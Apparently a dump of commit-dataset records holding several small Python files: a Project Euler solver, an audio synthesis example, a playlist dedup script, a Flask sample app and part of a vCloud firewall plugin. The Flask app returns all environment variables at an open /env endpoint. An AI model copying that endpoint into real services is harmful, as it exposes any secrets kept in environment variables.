divisors.add(int(n / i))
divisors.add(i)
return divisors
def check_if_amicable(n1, n2):
if cached.get_value(n1) == 1:
cached.add_value(n1, sum(find_divisors(n1)))
if cached.get_value(n1) == n2:
return True
return False
def solve_problem(end_number):
amicable_numbers = set()
for n in range(1, end_number):
divisor_list = find_divisors(n)
list_sum = sum(divisor_list)
cached.add_value(n, list_sum)
if (list_sum != n):
if check_if_amicable(list_sum, n):
amicable_numbers.update([list_sum, n])
return(amicable_numbers)
if __name__ == "__main__":
ending_number = 10000
cached = DivisorSums()
print(sum(solve_problem(ending_number)))
|
Solve amicable numbers with cache
|
Solve amicable numbers with cache
|
Python
|
mit
|
daveinnyc/various,daveinnyc/various,daveinnyc/various,daveinnyc/various,daveinnyc/various,daveinnyc/various,daveinnyc/various
|
Solve amicable numbers with cache
|
'''
Problem 021
Let d(n) be defined as the sum of proper divisors of n (numbers less than n
which divide evenly into n).
If d(a) = b and d(b) = a, where a ≠ b, then a and b are an amicable pair and
each of a and b are called amicable numbers.
For example, the proper divisors of 220 are 1, 2, 4, 5, 10, 11, 20, 22, 44, 55
and 110; therefore d(220) = 284. The proper divisors of 284 are 1, 2, 4, 71
and 142; so d(284) = 220.
Evaluate the sum of all the amicable numbers under 10000.
Solution: Copyright 2017 Dave Cuthbert, MIT License
'''
import math
from collections import defaultdict
class DivisorSums():
sum_cache = defaultdict(lambda:1)
def _init_(self):
self.sum_cache
def add_value(self, n1, n2):
self.sum_cache[n1] = n2
def get_value(self, n1):
return self.sum_cache[n1]
def find_divisors(n):
divisors = {1}
for i in range(2, int(math.sqrt(n)) + 1):
if n % i == 0:
divisors.add(int(n / i))
divisors.add(i)
return divisors
def check_if_amicable(n1, n2):
if cached.get_value(n1) == 1:
cached.add_value(n1, sum(find_divisors(n1)))
if cached.get_value(n1) == n2:
return True
return False
def solve_problem(end_number):
amicable_numbers = set()
for n in range(1, end_number):
divisor_list = find_divisors(n)
list_sum = sum(divisor_list)
cached.add_value(n, list_sum)
if (list_sum != n):
if check_if_amicable(list_sum, n):
amicable_numbers.update([list_sum, n])
return(amicable_numbers)
if __name__ == "__main__":
ending_number = 10000
cached = DivisorSums()
print(sum(solve_problem(ending_number)))
|
<commit_before><commit_msg>Solve amicable numbers with cache<commit_after>
|
'''
Problem 021
Let d(n) be defined as the sum of proper divisors of n (numbers less than n
which divide evenly into n).
If d(a) = b and d(b) = a, where a ≠ b, then a and b are an amicable pair and
each of a and b are called amicable numbers.
For example, the proper divisors of 220 are 1, 2, 4, 5, 10, 11, 20, 22, 44, 55
and 110; therefore d(220) = 284. The proper divisors of 284 are 1, 2, 4, 71
and 142; so d(284) = 220.
Evaluate the sum of all the amicable numbers under 10000.
Solution: Copyright 2017 Dave Cuthbert, MIT License
'''
import math
from collections import defaultdict
class DivisorSums():
sum_cache = defaultdict(lambda:1)
def _init_(self):
self.sum_cache
def add_value(self, n1, n2):
self.sum_cache[n1] = n2
def get_value(self, n1):
return self.sum_cache[n1]
def find_divisors(n):
divisors = {1}
for i in range(2, int(math.sqrt(n)) + 1):
if n % i == 0:
divisors.add(int(n / i))
divisors.add(i)
return divisors
def check_if_amicable(n1, n2):
if cached.get_value(n1) == 1:
cached.add_value(n1, sum(find_divisors(n1)))
if cached.get_value(n1) == n2:
return True
return False
def solve_problem(end_number):
amicable_numbers = set()
for n in range(1, end_number):
divisor_list = find_divisors(n)
list_sum = sum(divisor_list)
cached.add_value(n, list_sum)
if (list_sum != n):
if check_if_amicable(list_sum, n):
amicable_numbers.update([list_sum, n])
return(amicable_numbers)
if __name__ == "__main__":
ending_number = 10000
cached = DivisorSums()
print(sum(solve_problem(ending_number)))
|
Solve amicable numbers with cache'''
Problem 021
Let d(n) be defined as the sum of proper divisors of n (numbers less than n
which divide evenly into n).
If d(a) = b and d(b) = a, where a ≠ b, then a and b are an amicable pair and
each of a and b are called amicable numbers.
For example, the proper divisors of 220 are 1, 2, 4, 5, 10, 11, 20, 22, 44, 55
and 110; therefore d(220) = 284. The proper divisors of 284 are 1, 2, 4, 71
and 142; so d(284) = 220.
Evaluate the sum of all the amicable numbers under 10000.
Solution: Copyright 2017 Dave Cuthbert, MIT License
'''
import math
from collections import defaultdict
class DivisorSums():
sum_cache = defaultdict(lambda:1)
def _init_(self):
self.sum_cache
def add_value(self, n1, n2):
self.sum_cache[n1] = n2
def get_value(self, n1):
return self.sum_cache[n1]
def find_divisors(n):
divisors = {1}
for i in range(2, int(math.sqrt(n)) + 1):
if n % i == 0:
divisors.add(int(n / i))
divisors.add(i)
return divisors
def check_if_amicable(n1, n2):
if cached.get_value(n1) == 1:
cached.add_value(n1, sum(find_divisors(n1)))
if cached.get_value(n1) == n2:
return True
return False
def solve_problem(end_number):
amicable_numbers = set()
for n in range(1, end_number):
divisor_list = find_divisors(n)
list_sum = sum(divisor_list)
cached.add_value(n, list_sum)
if (list_sum != n):
if check_if_amicable(list_sum, n):
amicable_numbers.update([list_sum, n])
return(amicable_numbers)
if __name__ == "__main__":
ending_number = 10000
cached = DivisorSums()
print(sum(solve_problem(ending_number)))
|
<commit_before><commit_msg>Solve amicable numbers with cache<commit_after>'''
Problem 021
Let d(n) be defined as the sum of proper divisors of n (numbers less than n
which divide evenly into n).
If d(a) = b and d(b) = a, where a ≠ b, then a and b are an amicable pair and
each of a and b are called amicable numbers.
For example, the proper divisors of 220 are 1, 2, 4, 5, 10, 11, 20, 22, 44, 55
and 110; therefore d(220) = 284. The proper divisors of 284 are 1, 2, 4, 71
and 142; so d(284) = 220.
Evaluate the sum of all the amicable numbers under 10000.
Solution: Copyright 2017 Dave Cuthbert, MIT License
'''
import math
from collections import defaultdict
class DivisorSums():
sum_cache = defaultdict(lambda:1)
def _init_(self):
self.sum_cache
def add_value(self, n1, n2):
self.sum_cache[n1] = n2
def get_value(self, n1):
return self.sum_cache[n1]
def find_divisors(n):
divisors = {1}
for i in range(2, int(math.sqrt(n)) + 1):
if n % i == 0:
divisors.add(int(n / i))
divisors.add(i)
return divisors
def check_if_amicable(n1, n2):
if cached.get_value(n1) == 1:
cached.add_value(n1, sum(find_divisors(n1)))
if cached.get_value(n1) == n2:
return True
return False
def solve_problem(end_number):
amicable_numbers = set()
for n in range(1, end_number):
divisor_list = find_divisors(n)
list_sum = sum(divisor_list)
cached.add_value(n, list_sum)
if (list_sum != n):
if check_if_amicable(list_sum, n):
amicable_numbers.update([list_sum, n])
return(amicable_numbers)
if __name__ == "__main__":
ending_number = 10000
cached = DivisorSums()
print(sum(solve_problem(ending_number)))
|
|
513b64423999f85f0cbc9cc0a44d6ef5962dd171
|
examples/mdct_synth.py
|
examples/mdct_synth.py
|
import featureflow as ff
import zounds
from random import choice
samplerate = zounds.SR11025()
BaseDocument = zounds.stft(resample_to=samplerate)
@zounds.simple_lmdb_settings('mdct_synth', map_size=1e10)
class Document(BaseDocument):
mdct = zounds.TimeFrequencyRepresentationFeature(
zounds.MDCT,
needs=BaseDocument.windowed,
store=True)
bark = zounds.ConstantRateTimeSeriesFeature(
zounds.BarkBands,
needs=BaseDocument.fft,
store=True)
@zounds.simple_settings
class DctKmeans(ff.BaseModel):
docs = ff.Feature(
ff.IteratorNode,
store=False)
shuffle = ff.NumpyFeature(
zounds.ReservoirSampler,
nsamples=1e6,
needs=docs,
store=True)
log = ff.PickleFeature(
zounds.Log,
needs=shuffle,
store=False)
unit_norm = ff.PickleFeature(
zounds.UnitNorm,
needs=log,
store=False)
kmeans = ff.PickleFeature(
zounds.KMeans,
centroids=512,
needs=unit_norm,
store=False)
pipeline = ff.PickleFeature(
zounds.PreprocessingPipeline,
needs=(log, unit_norm, kmeans),
store=True)
@zounds.simple_lmdb_settings('mdct_synth_with_codes', map_size=1e10)
class WithCodes(Document):
kmeans = zounds.ConstantRateTimeSeriesFeature(
zounds.Learned,
learned=DctKmeans(),
needs=Document.mdct,
store=True)
if __name__ == '__main__':
# stream all the audio files from the zip archive
filename = 'FlavioGaete22.zip'
print 'Processing Audio...'
for zf in ff.iter_zip(filename):
if '._' in zf.filename:
continue
print zf.filename
Document.process(meta=zf)
# learn k-means clusters for the mdct frames
print 'learning k-means clusters'
DctKmeans.process(docs=(doc.mdct for doc in Document))
synth = zounds.MDCTSynthesizer()
docs = list(doc for doc in WithCodes)
kmeans = DctKmeans()
def random_reconstruction():
doc = choice(docs)
transform_result = kmeans.pipeline.transform(doc.mdct)
recon_mdct = transform_result.inverse_transform()
recon_audio = synth.synthesize(recon_mdct)
return doc.ogg, recon_audio
app = zounds.ZoundsApp(
model=Document,
audio_feature=Document.ogg,
visualization_feature=Document.bark,
globals=globals(),
locals=locals())
app.start(8888)
|
Add new example for a simple k-means encoded MDCT synthesizer
|
Add new example for a simple k-means encoded MDCT synthesizer
|
Python
|
mit
|
JohnVinyard/zounds,JohnVinyard/zounds,JohnVinyard/zounds,JohnVinyard/zounds
|
Add new example for a simple k-means encoded MDCT synthesizer
|
import featureflow as ff
import zounds
from random import choice
samplerate = zounds.SR11025()
BaseDocument = zounds.stft(resample_to=samplerate)
@zounds.simple_lmdb_settings('mdct_synth', map_size=1e10)
class Document(BaseDocument):
mdct = zounds.TimeFrequencyRepresentationFeature(
zounds.MDCT,
needs=BaseDocument.windowed,
store=True)
bark = zounds.ConstantRateTimeSeriesFeature(
zounds.BarkBands,
needs=BaseDocument.fft,
store=True)
@zounds.simple_settings
class DctKmeans(ff.BaseModel):
docs = ff.Feature(
ff.IteratorNode,
store=False)
shuffle = ff.NumpyFeature(
zounds.ReservoirSampler,
nsamples=1e6,
needs=docs,
store=True)
log = ff.PickleFeature(
zounds.Log,
needs=shuffle,
store=False)
unit_norm = ff.PickleFeature(
zounds.UnitNorm,
needs=log,
store=False)
kmeans = ff.PickleFeature(
zounds.KMeans,
centroids=512,
needs=unit_norm,
store=False)
pipeline = ff.PickleFeature(
zounds.PreprocessingPipeline,
needs=(log, unit_norm, kmeans),
store=True)
@zounds.simple_lmdb_settings('mdct_synth_with_codes', map_size=1e10)
class WithCodes(Document):
kmeans = zounds.ConstantRateTimeSeriesFeature(
zounds.Learned,
learned=DctKmeans(),
needs=Document.mdct,
store=True)
if __name__ == '__main__':
# stream all the audio files from the zip archive
filename = 'FlavioGaete22.zip'
print 'Processing Audio...'
for zf in ff.iter_zip(filename):
if '._' in zf.filename:
continue
print zf.filename
Document.process(meta=zf)
# learn k-means clusters for the mdct frames
print 'learning k-means clusters'
DctKmeans.process(docs=(doc.mdct for doc in Document))
synth = zounds.MDCTSynthesizer()
docs = list(doc for doc in WithCodes)
kmeans = DctKmeans()
def random_reconstruction():
doc = choice(docs)
transform_result = kmeans.pipeline.transform(doc.mdct)
recon_mdct = transform_result.inverse_transform()
recon_audio = synth.synthesize(recon_mdct)
return doc.ogg, recon_audio
app = zounds.ZoundsApp(
model=Document,
audio_feature=Document.ogg,
visualization_feature=Document.bark,
globals=globals(),
locals=locals())
app.start(8888)
|
<commit_before><commit_msg>Add new example for a simple k-means encoded MDCT synthesizer<commit_after>
|
import featureflow as ff
import zounds
from random import choice
samplerate = zounds.SR11025()
BaseDocument = zounds.stft(resample_to=samplerate)
@zounds.simple_lmdb_settings('mdct_synth', map_size=1e10)
class Document(BaseDocument):
mdct = zounds.TimeFrequencyRepresentationFeature(
zounds.MDCT,
needs=BaseDocument.windowed,
store=True)
bark = zounds.ConstantRateTimeSeriesFeature(
zounds.BarkBands,
needs=BaseDocument.fft,
store=True)
@zounds.simple_settings
class DctKmeans(ff.BaseModel):
docs = ff.Feature(
ff.IteratorNode,
store=False)
shuffle = ff.NumpyFeature(
zounds.ReservoirSampler,
nsamples=1e6,
needs=docs,
store=True)
log = ff.PickleFeature(
zounds.Log,
needs=shuffle,
store=False)
unit_norm = ff.PickleFeature(
zounds.UnitNorm,
needs=log,
store=False)
kmeans = ff.PickleFeature(
zounds.KMeans,
centroids=512,
needs=unit_norm,
store=False)
pipeline = ff.PickleFeature(
zounds.PreprocessingPipeline,
needs=(log, unit_norm, kmeans),
store=True)
@zounds.simple_lmdb_settings('mdct_synth_with_codes', map_size=1e10)
class WithCodes(Document):
kmeans = zounds.ConstantRateTimeSeriesFeature(
zounds.Learned,
learned=DctKmeans(),
needs=Document.mdct,
store=True)
if __name__ == '__main__':
# stream all the audio files from the zip archive
filename = 'FlavioGaete22.zip'
print 'Processing Audio...'
for zf in ff.iter_zip(filename):
if '._' in zf.filename:
continue
print zf.filename
Document.process(meta=zf)
# learn k-means clusters for the mdct frames
print 'learning k-means clusters'
DctKmeans.process(docs=(doc.mdct for doc in Document))
synth = zounds.MDCTSynthesizer()
docs = list(doc for doc in WithCodes)
kmeans = DctKmeans()
def random_reconstruction():
doc = choice(docs)
transform_result = kmeans.pipeline.transform(doc.mdct)
recon_mdct = transform_result.inverse_transform()
recon_audio = synth.synthesize(recon_mdct)
return doc.ogg, recon_audio
app = zounds.ZoundsApp(
model=Document,
audio_feature=Document.ogg,
visualization_feature=Document.bark,
globals=globals(),
locals=locals())
app.start(8888)
|
Add new example for a simple k-means encoded MDCT synthesizerimport featureflow as ff
import zounds
from random import choice
samplerate = zounds.SR11025()
BaseDocument = zounds.stft(resample_to=samplerate)
@zounds.simple_lmdb_settings('mdct_synth', map_size=1e10)
class Document(BaseDocument):
mdct = zounds.TimeFrequencyRepresentationFeature(
zounds.MDCT,
needs=BaseDocument.windowed,
store=True)
bark = zounds.ConstantRateTimeSeriesFeature(
zounds.BarkBands,
needs=BaseDocument.fft,
store=True)
@zounds.simple_settings
class DctKmeans(ff.BaseModel):
docs = ff.Feature(
ff.IteratorNode,
store=False)
shuffle = ff.NumpyFeature(
zounds.ReservoirSampler,
nsamples=1e6,
needs=docs,
store=True)
log = ff.PickleFeature(
zounds.Log,
needs=shuffle,
store=False)
unit_norm = ff.PickleFeature(
zounds.UnitNorm,
needs=log,
store=False)
kmeans = ff.PickleFeature(
zounds.KMeans,
centroids=512,
needs=unit_norm,
store=False)
pipeline = ff.PickleFeature(
zounds.PreprocessingPipeline,
needs=(log, unit_norm, kmeans),
store=True)
@zounds.simple_lmdb_settings('mdct_synth_with_codes', map_size=1e10)
class WithCodes(Document):
kmeans = zounds.ConstantRateTimeSeriesFeature(
zounds.Learned,
learned=DctKmeans(),
needs=Document.mdct,
store=True)
if __name__ == '__main__':
# stream all the audio files from the zip archive
filename = 'FlavioGaete22.zip'
print 'Processing Audio...'
for zf in ff.iter_zip(filename):
if '._' in zf.filename:
continue
print zf.filename
Document.process(meta=zf)
# learn k-means clusters for the mdct frames
print 'learning k-means clusters'
DctKmeans.process(docs=(doc.mdct for doc in Document))
synth = zounds.MDCTSynthesizer()
docs = list(doc for doc in WithCodes)
kmeans = DctKmeans()
def random_reconstruction():
doc = choice(docs)
transform_result = kmeans.pipeline.transform(doc.mdct)
recon_mdct = transform_result.inverse_transform()
recon_audio = synth.synthesize(recon_mdct)
return doc.ogg, recon_audio
app = zounds.ZoundsApp(
model=Document,
audio_feature=Document.ogg,
visualization_feature=Document.bark,
globals=globals(),
locals=locals())
app.start(8888)
|
<commit_before><commit_msg>Add new example for a simple k-means encoded MDCT synthesizer<commit_after>import featureflow as ff
import zounds
from random import choice
samplerate = zounds.SR11025()
BaseDocument = zounds.stft(resample_to=samplerate)
@zounds.simple_lmdb_settings('mdct_synth', map_size=1e10)
class Document(BaseDocument):
mdct = zounds.TimeFrequencyRepresentationFeature(
zounds.MDCT,
needs=BaseDocument.windowed,
store=True)
bark = zounds.ConstantRateTimeSeriesFeature(
zounds.BarkBands,
needs=BaseDocument.fft,
store=True)
@zounds.simple_settings
class DctKmeans(ff.BaseModel):
docs = ff.Feature(
ff.IteratorNode,
store=False)
shuffle = ff.NumpyFeature(
zounds.ReservoirSampler,
nsamples=1e6,
needs=docs,
store=True)
log = ff.PickleFeature(
zounds.Log,
needs=shuffle,
store=False)
unit_norm = ff.PickleFeature(
zounds.UnitNorm,
needs=log,
store=False)
kmeans = ff.PickleFeature(
zounds.KMeans,
centroids=512,
needs=unit_norm,
store=False)
pipeline = ff.PickleFeature(
zounds.PreprocessingPipeline,
needs=(log, unit_norm, kmeans),
store=True)
@zounds.simple_lmdb_settings('mdct_synth_with_codes', map_size=1e10)
class WithCodes(Document):
kmeans = zounds.ConstantRateTimeSeriesFeature(
zounds.Learned,
learned=DctKmeans(),
needs=Document.mdct,
store=True)
if __name__ == '__main__':
# stream all the audio files from the zip archive
filename = 'FlavioGaete22.zip'
print 'Processing Audio...'
for zf in ff.iter_zip(filename):
if '._' in zf.filename:
continue
print zf.filename
Document.process(meta=zf)
# learn k-means clusters for the mdct frames
print 'learning k-means clusters'
DctKmeans.process(docs=(doc.mdct for doc in Document))
synth = zounds.MDCTSynthesizer()
docs = list(doc for doc in WithCodes)
kmeans = DctKmeans()
def random_reconstruction():
doc = choice(docs)
transform_result = kmeans.pipeline.transform(doc.mdct)
recon_mdct = transform_result.inverse_transform()
recon_audio = synth.synthesize(recon_mdct)
return doc.ogg, recon_audio
app = zounds.ZoundsApp(
model=Document,
audio_feature=Document.ogg,
visualization_feature=Document.bark,
globals=globals(),
locals=locals())
app.start(8888)
|
|
2137970240a9524990d55d711951fb7358621275
|
dedup_xspf.py
|
dedup_xspf.py
|
import xml.etree.ElementTree as ET
from urllib.parse import unquote, urlparse
import os
import sys
from fuzzywuzzy import process, fuzz # ImportError? pip install 'fuzzywuzzy[speedup]'
import re
files = [unquote(urlparse(el.text).path)
for el in ET.parse(sys.argv[1]).getroot()
.findall(".//*/{http://xspf.org/ns/0/}location")
]
pfx = len(os.path.commonprefix(files))
trimmed = [re.search(r" - ([^_]+)", f[pfx:]).group(1) for f in files]
for i, file in enumerate(files):
others = trimmed[i + 1:] # Assume that similarity is commutative
any = False
for name, score in process.extractBests(trimmed[i], others, score_cutoff=80, scorer=fuzz.token_set_ratio):
if not any:
any = True
print(file)
print(name)
if any: print("-----")
|
Create a little dedup script, probably not very general
|
Create a little dedup script, probably not very general
|
Python
|
mit
|
Rosuav/shed,Rosuav/shed,Rosuav/shed,Rosuav/shed,Rosuav/shed
|
Create a little dedup script, probably not very general
|
import xml.etree.ElementTree as ET
from urllib.parse import unquote, urlparse
import os
import sys
from fuzzywuzzy import process, fuzz # ImportError? pip install 'fuzzywuzzy[speedup]'
import re
files = [unquote(urlparse(el.text).path)
for el in ET.parse(sys.argv[1]).getroot()
.findall(".//*/{http://xspf.org/ns/0/}location")
]
pfx = len(os.path.commonprefix(files))
trimmed = [re.search(r" - ([^_]+)", f[pfx:]).group(1) for f in files]
for i, file in enumerate(files):
others = trimmed[i + 1:] # Assume that similarity is commutative
any = False
for name, score in process.extractBests(trimmed[i], others, score_cutoff=80, scorer=fuzz.token_set_ratio):
if not any:
any = True
print(file)
print(name)
if any: print("-----")
|
<commit_before><commit_msg>Create a little dedup script, probably not very general<commit_after>
|
import xml.etree.ElementTree as ET
from urllib.parse import unquote, urlparse
import os
import sys
from fuzzywuzzy import process, fuzz # ImportError? pip install 'fuzzywuzzy[speedup]'
import re
files = [unquote(urlparse(el.text).path)
for el in ET.parse(sys.argv[1]).getroot()
.findall(".//*/{http://xspf.org/ns/0/}location")
]
pfx = len(os.path.commonprefix(files))
trimmed = [re.search(r" - ([^_]+)", f[pfx:]).group(1) for f in files]
for i, file in enumerate(files):
others = trimmed[i + 1:] # Assume that similarity is commutative
any = False
for name, score in process.extractBests(trimmed[i], others, score_cutoff=80, scorer=fuzz.token_set_ratio):
if not any:
any = True
print(file)
print(name)
if any: print("-----")
|
Create a little dedup script, probably not very generalimport xml.etree.ElementTree as ET
from urllib.parse import unquote, urlparse
import os
import sys
from fuzzywuzzy import process, fuzz # ImportError? pip install 'fuzzywuzzy[speedup]'
import re
files = [unquote(urlparse(el.text).path)
for el in ET.parse(sys.argv[1]).getroot()
.findall(".//*/{http://xspf.org/ns/0/}location")
]
pfx = len(os.path.commonprefix(files))
trimmed = [re.search(r" - ([^_]+)", f[pfx:]).group(1) for f in files]
for i, file in enumerate(files):
others = trimmed[i + 1:] # Assume that similarity is commutative
any = False
for name, score in process.extractBests(trimmed[i], others, score_cutoff=80, scorer=fuzz.token_set_ratio):
if not any:
any = True
print(file)
print(name)
if any: print("-----")
|
<commit_before><commit_msg>Create a little dedup script, probably not very general<commit_after>import xml.etree.ElementTree as ET
from urllib.parse import unquote, urlparse
import os
import sys
from fuzzywuzzy import process, fuzz # ImportError? pip install 'fuzzywuzzy[speedup]'
import re
files = [unquote(urlparse(el.text).path)
for el in ET.parse(sys.argv[1]).getroot()
.findall(".//*/{http://xspf.org/ns/0/}location")
]
pfx = len(os.path.commonprefix(files))
trimmed = [re.search(r" - ([^_]+)", f[pfx:]).group(1) for f in files]
for i, file in enumerate(files):
others = trimmed[i + 1:] # Assume that similarity is commutative
any = False
for name, score in process.extractBests(trimmed[i], others, score_cutoff=80, scorer=fuzz.token_set_ratio):
if not any:
any = True
print(file)
print(name)
if any: print("-----")
|
|
6acb354fff4aafcdc006a13d947721d7dcfff5c5
|
sample/src/app/app.py
|
sample/src/app/app.py
|
#!/usr/bin/env python
import os
import json
from flask import jsonify
from flask import Flask
app = Flask(__name__)
@app.route("/env")
def environment():
properties = []
for k,v in sorted(os.environ.iteritems()):
properties.append(k + "=" + v)
return json.dumps(properties, indent=4)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=int(os.getenv('PORT', '8080')))
|
#!/usr/bin/env python
import os
import json
from flask import jsonify
from flask import Flask
app = Flask(__name__)
@app.route("/env")
def environment():
return json.dumps(dict(os.environ), indent=4)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=int(os.getenv('PORT', '8080')))
|
Return env as dict rather than array of properties
|
Return env as dict rather than array of properties
|
Python
|
apache-2.0
|
cf-platform-eng/tile-generator,cf-platform-eng/tile-generator,alex-slynko/tile-generator,alex-slynko/tile-generator,alex-slynko/tile-generator,alex-slynko/tile-generator,cf-platform-eng/tile-generator,cf-platform-eng/tile-generator
|
#!/usr/bin/env python
import os
import json
from flask import jsonify
from flask import Flask
app = Flask(__name__)
@app.route("/env")
def environment():
properties = []
for k,v in sorted(os.environ.iteritems()):
properties.append(k + "=" + v)
return json.dumps(properties, indent=4)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=int(os.getenv('PORT', '8080')))
Return env as dict rather than array of properties
|
#!/usr/bin/env python
import os
import json
from flask import jsonify
from flask import Flask
app = Flask(__name__)
@app.route("/env")
def environment():
return json.dumps(dict(os.environ), indent=4)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=int(os.getenv('PORT', '8080')))
|
<commit_before>#!/usr/bin/env python
import os
import json
from flask import jsonify
from flask import Flask
app = Flask(__name__)
@app.route("/env")
def environment():
properties = []
for k,v in sorted(os.environ.iteritems()):
properties.append(k + "=" + v)
return json.dumps(properties, indent=4)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=int(os.getenv('PORT', '8080')))
<commit_msg>Return env as dict rather than array of properties<commit_after>
|
#!/usr/bin/env python
import os
import json
from flask import jsonify
from flask import Flask
app = Flask(__name__)
@app.route("/env")
def environment():
return json.dumps(dict(os.environ), indent=4)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=int(os.getenv('PORT', '8080')))
|
#!/usr/bin/env python
import os
import json
from flask import jsonify
from flask import Flask
app = Flask(__name__)
@app.route("/env")
def environment():
properties = []
for k,v in sorted(os.environ.iteritems()):
properties.append(k + "=" + v)
return json.dumps(properties, indent=4)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=int(os.getenv('PORT', '8080')))
Return env as dict rather than array of properties#!/usr/bin/env python
import os
import json
from flask import jsonify
from flask import Flask
app = Flask(__name__)
@app.route("/env")
def environment():
return json.dumps(dict(os.environ), indent=4)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=int(os.getenv('PORT', '8080')))
|
<commit_before>#!/usr/bin/env python
import os
import json
from flask import jsonify
from flask import Flask
app = Flask(__name__)
@app.route("/env")
def environment():
properties = []
for k,v in sorted(os.environ.iteritems()):
properties.append(k + "=" + v)
return json.dumps(properties, indent=4)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=int(os.getenv('PORT', '8080')))
<commit_msg>Return env as dict rather than array of properties<commit_after>#!/usr/bin/env python
import os
import json
from flask import jsonify
from flask import Flask
app = Flask(__name__)
@app.route("/env")
def environment():
return json.dumps(dict(os.environ), indent=4)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=int(os.getenv('PORT', '8080')))
|
84fe4ef3b99990afba49a5943c9523797cdb5a7a
|
network_plugin/security_group.py
|
network_plugin/security_group.py
|
from cloudify import ctx
from cloudify import exceptions as cfy_exc
from cloudify.decorators import operation
from vcloud_plugin_common import with_vcd_client, wait_for_task
from network_operations import ProxyVCD
from network_plugin import check_ip, get_vm_ip
valid_protocols = ["Tcp", "Udp", "Icmp", "Any"]
CREATE_RULE = 1
DELETE_RULE = 2
@operation
@with_vcd_client
def create(vcd_client, **kwargs):
_rule_operation(CREATE_RULE, vcd_client)
@operation
@with_vcd_client
def delete(vcd_client, **kwargs):
_rule_operation(DELETE_RULE, vcd_client)
def _rule_operation(operation, vcd_client):
vcd_client = ProxyVCD(vcd_client) # TODO: remove when our code merged in pyvcloud
gateway = vcd_client.get_gateway(
ctx.node.properties['gateway'])
protocol = _check_protocol(ctx.node.properties['rule']['protocol'])
dest_port = str(ctx.node.properties['rule']['port'])
description = ctx.node.properties['rule']['description']
dest_ip = check_ip(get_vm_ip(vcd_client, ctx))
task = None
if operation == CREATE_RULE:
success, task = gateway.add_fw_rule(True, description, "allow", protocol, dest_port, dest_ip,
"Any", "External", False)
if not success:
raise cfy_exc.NonRecoverableError(
"Could not add firewall rule: {0}".format(description))
if operation == DELETE_RULE:
success, task = gateway.delete_fw_rule(protocol, dest_port, dest_ip,
"Any", "external")
if not success:
raise cfy_exc.NonRecoverableError(
"Could not delete firewall rule: {0}".format(description))
if task:
wait_for_task(vcd_client, task)
def _check_protocol(protocol):
protocol = protocol.capitalize()
if protocol not in valid_protocols:
raise cfy_exc.NonRecoverableError(
"Unknown protocol: {0}. Valid protocols are: {1}".format(protocol, valid_protocols))
return protocol
|
Add new security group operation source code
|
Add new security group operation source code
|
Python
|
apache-2.0
|
nmishkin/tosca-vcloud-plugin,cloudify-cosmo/tosca-vcloud-plugin,kemiz/tosca-vcloud-plugin,denismakogon/tosca-vcloud-plugin,vmware/tosca-vcloud-plugin,geokala/tosca-vcloud-plugin
|
Add new security group operation source code
|
from cloudify import ctx
from cloudify import exceptions as cfy_exc
from cloudify.decorators import operation
from vcloud_plugin_common import with_vcd_client, wait_for_task
from network_operations import ProxyVCD
from network_plugin import check_ip, get_vm_ip
valid_protocols = ["Tcp", "Udp", "Icmp", "Any"]
CREATE_RULE = 1
DELETE_RULE = 2
@operation
@with_vcd_client
def create(vcd_client, **kwargs):
_rule_operation(CREATE_RULE, vcd_client)
@operation
@with_vcd_client
def delete(vcd_client, **kwargs):
_rule_operation(DELETE_RULE, vcd_client)
def _rule_operation(operation, vcd_client):
vcd_client = ProxyVCD(vcd_client) # TODO: remove when our code merged in pyvcloud
gateway = vcd_client.get_gateway(
ctx.node.properties['gateway'])
protocol = _check_protocol(ctx.node.properties['rule']['protocol'])
dest_port = str(ctx.node.properties['rule']['port'])
description = ctx.node.properties['rule']['description']
dest_ip = check_ip(get_vm_ip(vcd_client, ctx))
task = None
if operation == CREATE_RULE:
success, task = gateway.add_fw_rule(True, description, "allow", protocol, dest_port, dest_ip,
"Any", "External", False)
if not success:
raise cfy_exc.NonRecoverableError(
"Could not add firewall rule: {0}".format(description))
if operation == DELETE_RULE:
success, task = gateway.delete_fw_rule(protocol, dest_port, dest_ip,
"Any", "external")
if not success:
raise cfy_exc.NonRecoverableError(
"Could not delete firewall rule: {0}".format(description))
if task:
wait_for_task(vcd_client, task)
def _check_protocol(protocol):
protocol = protocol.capitalize()
if protocol not in valid_protocols:
raise cfy_exc.NonRecoverableError(
"Unknown protocol: {0}. Valid protocols are: {1}".format(protocol, valid_protocols))
return protocol
|
<commit_before><commit_msg>Add new security group operation source code<commit_after>
|
from cloudify import ctx
from cloudify import exceptions as cfy_exc
from cloudify.decorators import operation
from vcloud_plugin_common import with_vcd_client, wait_for_task
from network_operations import ProxyVCD
from network_plugin import check_ip, get_vm_ip
valid_protocols = ["Tcp", "Udp", "Icmp", "Any"]
CREATE_RULE = 1
DELETE_RULE = 2
@operation
@with_vcd_client
def create(vcd_client, **kwargs):
_rule_operation(CREATE_RULE, vcd_client)
@operation
@with_vcd_client
def delete(vcd_client, **kwargs):
_rule_operation(DELETE_RULE, vcd_client)
def _rule_operation(operation, vcd_client):
vcd_client = ProxyVCD(vcd_client) # TODO: remove when our code merged in pyvcloud
gateway = vcd_client.get_gateway(
ctx.node.properties['gateway'])
protocol = _check_protocol(ctx.node.properties['rule']['protocol'])
dest_port = str(ctx.node.properties['rule']['port'])
description = ctx.node.properties['rule']['description']
dest_ip = check_ip(get_vm_ip(vcd_client, ctx))
task = None
if operation == CREATE_RULE:
success, task = gateway.add_fw_rule(True, description, "allow", protocol, dest_port, dest_ip,
"Any", "External", False)
if not success:
raise cfy_exc.NonRecoverableError(
"Could not add firewall rule: {0}".format(description))
if operation == DELETE_RULE:
success, task = gateway.delete_fw_rule(protocol, dest_port, dest_ip,
"Any", "external")
if not success:
raise cfy_exc.NonRecoverableError(
"Could not delete firewall rule: {0}".format(description))
if task:
wait_for_task(vcd_client, task)
def _check_protocol(protocol):
protocol = protocol.capitalize()
if protocol not in valid_protocols:
raise cfy_exc.NonRecoverableError(
"Unknown protocol: {0}. Valid protocols are: {1}".format(protocol, valid_protocols))
return protocol
|
Add new security group operation source codefrom cloudify import ctx
from cloudify import exceptions as cfy_exc
from cloudify.decorators import operation
